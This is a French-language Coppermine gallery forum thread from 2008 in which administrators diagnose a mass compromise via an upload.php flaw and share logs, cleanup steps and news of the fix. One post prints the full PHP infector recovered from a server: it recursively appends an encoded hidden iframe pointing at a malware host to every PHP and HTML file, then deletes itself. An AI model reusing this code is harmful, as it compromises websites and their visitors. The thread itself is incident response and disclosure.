forum.coppermine-gallery.net
Support => Français (French) => Language Specific Support => cpg1.4.x Français (French) => Topic started by: mafieuso on April 07, 2008, 11:07:56 pm
-
Bonjour,
J'ai l'impression que ma galerie à subit une attaque, elle est inaccessible et il y a des morceaux de codes bizarres dans certaines pages...
Voici par exemple le message que j'ai sur la passage d'acceuil :
Parse error: syntax error, unexpected '<' in /mnt/123/sdb/9/2/galeriebar/coppermine/anycontent.php on line 33
On retrouve ce code ajouté à plusieurs pages :
<?php echo '<iframe src="&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;" width=1 height=1></iframe>'; ?>
Que dois-je faire ?
Merci de votre aide !
-
Aïe,
C'est exact !
Il y a effectivement un "exploit" qui injecte des IFRAMEs chargés de code PHP.
Je ne connais pas actuellement d'autres solutions que celles d'Uploader des fichiers "propres".
On ne doute pas que le problème semble sérieux, sans être destructeur...
Y-a-t-il un CMS tel Joomla ou SMF sur votre web ?
PYAP
ps : je connais hélas ce problème depuis le 03 Avril 2008 ???
-
Je vais envoyer les fichiers propres et en profiter pour passer la galerie en 1.4.16, je suis actuellement en 1.4.14 !
J'ai du mal à comprendre comment ce code à réussi à être injecté, est-ce que quelqu'un pourrait m'expliquer ?
En fait j'ai été averti par un membre pour lequel son antivirus (Kaspersky) lui à indiqué la présence de ce script malicieux 'Trojan-télécharger.JS.Psyme.yc' mais je ne le trouve nul part et comment savoir si ce script à infecté mon ordinateur (ou celui d'autres membres) ? Est-ce qu'il faut faire une manipulation particulière pour qu'il s'active ?
-
La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !
-
Tu as le lien de la discussion ?
Sinon est-ce que la 1.4.16 corrige cette faille de sécurité ou autant attendre quelques jours la 1.4.17 ? Car en fait j'ai des modifications de certains fichiers php et c'est toujours chiant de devoir ensuite retrouver ce qu'on à modifié manuellement !
D'ailleurs à quand une méthode de mise à jour digne de ce nom chez Coppermine ? Marre de devoir envoyer tous les fichiers comme un barbare à chaque mise à jour...
-
Je fais un double message pour vous informer de quelque chose d'important :
Ce fichier malicieux m'a édité la base de donnée !!! Le contenu de la table config était complètement chamboulé, je l'ai remplacé par l'ancien mais j'aimerais bien savoir s'il n'a pas édité autre chose, surtout que s'il peut accéder à la bdd il peut très bien tout supprimer !
-
Bonjour,
Moi dimanche, je n'ai eu que les fichiers du plugin onlinestats de modifiés, tous les fichiers, y compris les fichiers langues, solution, désactiver ce plugin, (pour mon cas !!)
par précaution, effacement de tous les fichiers présents sur le serveur (je posséde une sauvegarde récente de toute ma galerie, y compris le répertoire Album),
Réinstallation complête, j'en ai profité pour modifier tous les mots de passes d'accés au serveur et aux bases de données.
Coppermine n'est pas la seule application qui ait été sujette à cette attaque.
La mise à jour vers CPG 1.416, semble limiter les dégats car je n'ai pas eut de modification de la BDD.
poubao ???
-
Je viens également de subir cette "attaque", est-ce qu'il y a un moyen d'arranger sa, en remplacant certain fichier ? en supprimant ? :-[
-
plusieurs personnes semblent être l'objet de cette attaque qui ne semble pas liée à coppermine puisque d'autres applications sont touchées.
Pour l'instant il n'y a pas de solution précise si ce n'est que ceux qui utilisent la version 1.4.16 sont moins touchés...
à suivre donc
-
La discussion est en cours chez un hébergeur Francophone.
Le résultat de la discuss dès que possible !
La discussion est impossible avec l'hébergeur... possédant la sciences infuse ???
-
Je ne comprends pas le code malveillant est encore présent sur ma galerie mais avant le déclaration de doctype de la page, quel est le fichier qui est infecté ? Je ne le trouve pas...
-
C'était un plugins autant pour moi...
-
Le quel?
poubao :D
-
La discussion est impossible avec l'hébergeur... possédant la sciences infuse
Le quel?
poubao
Celui qui commence par ***, et qui est connu pour ces //// ;D
C'était un plugins autant pour moi...
Le quel?
poubao
A mon humble avis, tous les scripts semblent être perméables ???
-
Le quel?
poubao :D
Tous, j'avais oublié d'envoyer de ré envoyer le dossier !
-
J'ai également un virus sur la galerie, un logiciel veut se lancer,
Il se nomme cdpuvbhfzz
Comment faire pour l'enlever?
Est ce le même que vous?
merci
-
Je crains que oui... mais chez moi rien ne voulait se lancer c'est bizarre, est-ce que ça dépend du navigateur ?
-
Chez moi ça se lance mais ça fait des choses bizarres (tous ce décalle)
-
J'ai aussi subi cette attaque (3 fois) depuis ce WE. J'étais en version 1.4.14 et j'ai fais une mise à jour en 1.4.16 mais l'attaque a recommencé ce soir. Tous les fichiers php et html sont modifiés (ajout de IFRAME). L'attaque vient d'une IP russe ! voici le log de l'attaque de ce soir :
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:43 +0200] "GET /copper/ HTTP/1.1" 200 39035 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:48 +0200] "GET /copper/update.php HTTP/1.1" 200 31881 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:49 +0200] "POST /copper/upload.php HTTP/1.1" 200 8607 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 13653 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:50 +0200] "POST /copper/upload.php HTTP/1.1" 200 8497 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:27:52 +0200] "POST /copper/admin.php HTTP/1.1" 200 8441 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:30 +0200] "GET /copper/?ff=1 HTTP/1.1" 200 18781 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
ppp91-76-23-21.pppoe.mtu-net.ru www.usf-handball.fr - [08/Apr/2008:19:28:31 +0200] "GET /copper/ HTTP/1.1" 200 22137 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
en version 1.4.14 le log était différent :
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:54 +0200] "GET /copper/ HTTP/1.1" 200 68683 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:58 +0200] "GET /copper/update.php HTTP/1.1" 200 40384 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:28:59 +0200] "POST /copper/pluginmgr.php?op=upload HTTP/1.1" 302 47195 "-" "Mozilla/8.0"
ppp91-76-134-39.pppoe.mtu-net.ru www.usf-handball.fr - [06/Apr/2008:16:29:30 +0200] "GET /copper/plugins/docs.php HTTP/1.1" 200 14 "-" "Mozilla/8.0"
-
Mais comment faire?
On doit remettre les fichiers de la maj 1.4.6?
-
en cherchant un peu sur le serveur, je viens de trouver dans le répertoire albums/userpics/10001 un fichier 142739_298w3.zip qui est en faite un fichier php
voici le contenu :
<?php
function fileExtension($file) {
$fileExp = explode('.', $file);
$filetype = $fileExp[count($fileExp)-1];
return $filetype;
}
function parse($path) {
$dir_array = array();
if ($handle = opendir($path)) {
while (false !== ($file = readdir($handle))) {
if ($file != "." && $file != "..") {
$try_dir = $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array, $try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext = fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle = fopen($path.$file, 'a+');
if($f_ext=="php") {
fwrite($fhandle, "<?php echo '<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>'; ?>");
}
else {
fwrite($fhandle, "<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}
return $dir_array;
}
function launch() {
$total = 0;
$last = 1;
$last_num = 0;
$path = $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs, $path);
while($last) {
$last_num = 0;
for( $j=$total; $j<$total+$last; $j++) {
$temp_dirs = parse($dirs[$j]);
$last_t = sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0; $i<$last_t; $i++) {
array_push($dirs, $temp_dirs[$i]);
}
}
$total += $last;
$last = $last_num;
}
$paths = $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];
unlink($paths);
if (is_file($paths)) {
$fhandle = fopen($paths, 'w');
fwrite($fhandle, "<?php echo'Upload plugins here'; ?>");
fclose($fhandle);
}
}
if (isset($_GET['ff']))
{
echo "~!";
launch();
}
echo '<iframe src=\"http://cdpuvbhfzz.com/dl/adv598.php\" width=1 height=1></iframe>';
?>
-
Bonjour,
Là on est tous d'accord, il y a un gros soucis de sécu !
La solution ultime consiste, hélas, à replacer des fichiers propres (Clean) !
N'oubliez pas de remplacer également vos fichiers de plugins, si vous en avez installé !
Il n'y a pas de solution logiciel actuellement....
Wait'n See ( attendre et voir)
PYAP
-
Ah oui j'avais oublié de signaler que j'avais aussi ce fichier zip, je l'ai supprimé sans regarder ce qu'il y avait dedans par peur d'une infection...
-
Et en le supprimant tu n'as eu aucun problème?
Je voulais savoir comment je fais pour tout remettre à jour en ayant un modded?
Je remet la mise à jour cpg1.4.16 puis le modded?
merci
-
Comme l'a dit Pascal YAP un peu plus haut il faut que tu remplaces les fichiers qui sont sur le FTP, tous les dossiers mis à part le dossier albums.
Si tu as une copie de tous ces fichiers sur ton pc avant l'attaque ça devrait être assez simple sinon il faut que tu télécharges la version que tu as sur le serveur et modifie les fichiers avant de tout retransférer.
-
J'ai remis la mise à jours cpg1.4.16.zip + le stramm_mod1_4_16_bridge.zip et j'ai toujours ce virus :(
-
Bon ben apparement la buse c'est faite aussi attaquée.
L'accès à ma galerie bugg, la mise en page est dans les choux, des albums semblent avoir disparus, mais peut être pas les photos.
Un membre m'avait signalé la présence d'un virus (dont je me rappelle plus le nom) à l'ouverture de la galerie. Cette après midi j'avais pu y aller, mais ce soir c'est dur dur. Pas moyen de m'identifier, ça bugg avant.
Très grosse galère pour moi à la mise en place de cette galerie, voilà que maintenant ça merdouille..................... :-\
:'(
-
vous me faites peur avé vos histoires là...
du coup sauvegarde "express" (façon de parler) des fichiers du serveur, lol
-
Pour mon cas j'a itélécharger récement une nouvelle version de Java Sun, Comme apparement Coppermine tourne avec ça le problème ne viendrait il pas de là?
-
Bonjour,
Pardon mon mauvais français, parce que je suis anglais. :) Mais nous avons le même problème ici:-
http://forum.coppermine-gallery.net/index.php/topic,51671.0.html (http://forum.coppermine-gallery.net/index.php/topic,51671.0.html)
G.
-
Merci pour l'info mr.goose.
-
Pour ma part tout semble être régler, jai remplacer tous les fichier par des fichier "propres". Supprimer le "fichier zip" qui avait été uploader et qui semplait être une des cause de ce big bug, activer l'inscription des utilisateur avant acces a la galerie. Et tout marche correctement pour le moment. Je croise les doigts pour que ca continue. Merci pour tous vos conseils en tout cas ;)
-
J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée
-
J'ai parler trop vite, maitenant il met impossible d'uploader un fichier que ce soit manuellement ou en passant par FTP. ???
-
Des virus semblent être dans le update de la nouvelle version de java. Mon antivirus m'en sort a chaque voit que je tente de me connecter a ma galerie.
-
J'ai également tous enlevé (sauf album) et tous remis et le virus c'est envolé ouf! je suis soulagée
Juste un petit détail dans chaque dossier d'images donc sous-dossiers de albums il y a normalement un fichier index.html qui est vide (juste pour éviter que quelqu'un se ballade dans le répertoire) or après l'attaque il y a dedans cette fameuse ligne de code bizarre, donc il si tu veux que ce soit complètement propre il te faut remplacer le index.html modifié par un fichier index.html vide (un simple fichier txt renommé fera l'affaire) dans chaque sous-dossier, c'est un peu long car il faut le faire manuellement mais bon ça vaut le coup à mon avis !
-
bonjour à tous, jai subit le même sort sur l'une de mes galerie :o bon je dois dire quant même que cette attaque et ce problème n'est pas du cas coppermine ;) mais à tout un tas de galerie ou CMS utilisant du code, ce sont tous les fichier index.php qui sont touché, donc le seul reméde à faire c'est de remplacer tous les fichiers index.php de votre CMS ou de votre galerie photo et vérifier le dossier /albums/userpics/ dedans l'on trouve un dossier par exemple ici /10001/ il correspont au upload effectué pour la galerie à l'intérieur de celui il y à peut être un zip virer le >:( voila ) un bon conseil aussi heureusement que j'avais installé le plugins de sauvegarde, une fois votre nettoyage fait tout reviens d'en l odre ;)
comment sa viens la dedans ou comment il peuvent changer les fichier index.php de nos galerie ou CMS j'en sais rien du tout :P
bonne fin de journéé à tous
-
ce sont tous les fichier index.php qui sont touché
Exact !
Mais pour être plus précis encore, se sont hélas TOUS les fichiers qui sont modifiés !
Idem pour les HTML du site. Idem pour les Plugin de Coppermine...
Même le fichier CONFIG.INC.PHP est touché ??? Qui est rappelons-le le cœur de Coppermine !
Il faut remplacer tous les fichiers de vos sites. C'est l'occasion pour faire une mise à jour 1.4.16 actuellement.
Mr.Goose signale ce Sujet en anglais (http://forum.coppermine-gallery.net/index.php/topic,51671.0.html) dans lequel il signale la présence suspect d'un fichier ZIP nommé comme ceci : 142739_298w3.zip
Perso n'ai pas trouvé ce fichier sur mon serveur !
PYAP
-
oui c'est bizarre, je viens aussi de poser la question sur le forum de guppy pour ce CMS on me dis faut le mettre à jour et que la faille étais connue, euh sauf que mon guppy était à jour au dernier crie, donc tu voi y à bien pour moi aussi des CMS qui sont touché :-\ pour la galerie directement je me suis rendu ici pour voir si vous en parliez un peu ;) encore des clowns qui non rien d'autre à faire que d'emmerder des gens qui vienne partager ici ou la l'une de leur petite passion grace à nos galerie ;)
cordialement, alain
-
Une vulnérabilité dans le fichier UPLOAD.PHP a été déceller.
Le fix est en TEST actuellement.
Mais déjà, il est possible de ne pas proposer la fonction URL/URI dans votre Galerie.
PYAP
-
Après une naissance dans la douleur voici la mort d'une galerie.
Amen. :'(
-
Non, je vais essayer de la rescuciter ;) (dès que j'ai un moment)
-
FIX COMMITED :
http://forum.coppermine-gallery.net/index.php/topic,51776.0.html
-
Désolé, je débarque, là...
Je n'autorise pas les upload dans ma galerie, suis-je à l'abri? (je pose la question car je n'ai pas la possibilité de modifier le ficher upload dans l'immédiat :-\ )
-
En tout cas vous en limitez sa fragilité !
-
OK, un grand merci pour la réponse. ;) De toutes façons, je modifie le fichier upload.php ce soir!
A bientôt (et j'en profitte au passage: encore un grand merci pour le boulot réalisé sur le forum!)
-
Coppermine 1.4.17 MISE A JOUR OBLIGATOIRE DE VOTRE GALERIE.
Voir le sujet ci après :
http://forum.coppermine-gallery.net/index.php/topic,51776.0.html
PYAP
-
Arf, trop tard, je me suis fait avoir cet aprem! :(
Faut tout supprimer et tout réinstaller, rien d'autre à faire?
-
1/ Comme signalé dans différents Posts, ici même et ailleurs, faites une mise à jour de vous Coppermine avec la version récemment mise à disposition.
2/ "Nettoyez" vos Plugins avec ceux présents sur votre disque dur.
3/ Vérifiez si vos HTML ne sont pas également touchés, ce qui est très probables.
4/ Recherchez si des fichiers suspects ne sont pas présent dans vos dossiers Albums (ZIP)
Lisez les messages concernant ce problème...
-
OK, ben je m'y colle demain! Merci... ;)
-
Je viens de trouver comment le fichier albums/userpics/10001/142739_298w3.zip était utilisé. La config du site a été modifié par l'attaque en ajoutant un lien vers ce fichier dans Paramètres des thèmes / Chemin pour inclure un en-tête de page personnalisé.
Il faut donc bien vérifier que le fichier albums/userpics/10001/142739_298w3.zip est supprimé et supprimer également la référence dans la configuration !
Bon WE à tous (j'espère plus calme, pour ma galerie préférée, que le WE dernier ;D)
-
Le fichier 142739_298w3.zip a aussi été ajouté en tant qu'image dans un album au hasard. Cette "image" est également à supprimer...
-
Personnellement je n'ai pas eu de fichiers zip, en revanche, j'avais bien supprimer les upload, mis les droits à 0 pour tous les groupes y compris l'admin et j'ai trouvé une image dans mon album perso, un chat complètement rasé. Enfin bref, image supprimée, galerie mise à jour en 1.4.17.
Je n'ai pour l'instant rien constaté d'anormal.
-
toutes ces attaques me font très peur à vrai dire je voudrais donc updater ma galerie: j'ai la version 1.4.10 modpack v1
Je dois donc installer la version cpg1417 + le stramm_mod1_4_17_bridge c'est ça?
En plus je ne suis pas très douée en anglais or le tutorial est en anglais :-\ Est-ce qu'il faut que je charge tout ce qu'il y a dans le dossier et que je vais sur update.php après?
Merci de m'aider un peu ce serait très gentil ;)
-
tout est dit ici http://forum.coppermine-gallery.net/index.php/topic,51776.msg251061.html#msg251061 (http://forum.coppermine-gallery.net/index.php/topic,51776.msg251061.html#msg251061)
P.S. Il faudrait quand même un peu chercher avant de poser des questions ;)
-
oui ça j'ai vu, ^^ il faut donc les installer séparemment je suppose...
-
l'un après l'autre oui
-
Pour ceux qui veulent en savoir plus sur ce problème qui a touché Coppermine et d'autres applications php, voici une bonne analyse ici (http://forum.malekal.com/viewtopic.php?f=62&t=10367&sid=d8dddea89578f364d09365162a2217c0)
poubao :D